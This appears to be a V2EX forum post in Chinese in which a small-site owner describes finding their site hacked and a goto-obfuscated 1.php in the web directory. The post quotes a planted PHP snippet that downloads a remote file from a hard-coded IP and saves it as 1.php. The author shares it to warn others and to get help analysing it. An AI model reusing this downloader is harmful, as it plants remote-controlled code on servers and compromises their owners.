事情经过: 1 个小网站前几天都还登录过去,昨天登录后台竟然提示密码不对, 再试了 3 次一样提示,心里顿时不对劲,估计被黑了,立马返回网站首页查看源代码,果然被挂了 xx 内容,然后进宝塔进网站目录查看,发现了 1.php 文件。打开发现文件是 goto 加密,思考了片刻,还原不了。
例外在其他目录文件也发现了下面的片段:
<?php
$a="copy";
$a("http://23.251.35.165/as.txt","1.php");
?>
这个远程 txt 地址就是入侵者用来生成 1.php
请各路神仙帮忙分析分析,里面都装的啥内容,希望让更多的 v 友知道,预防一下 🙏
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.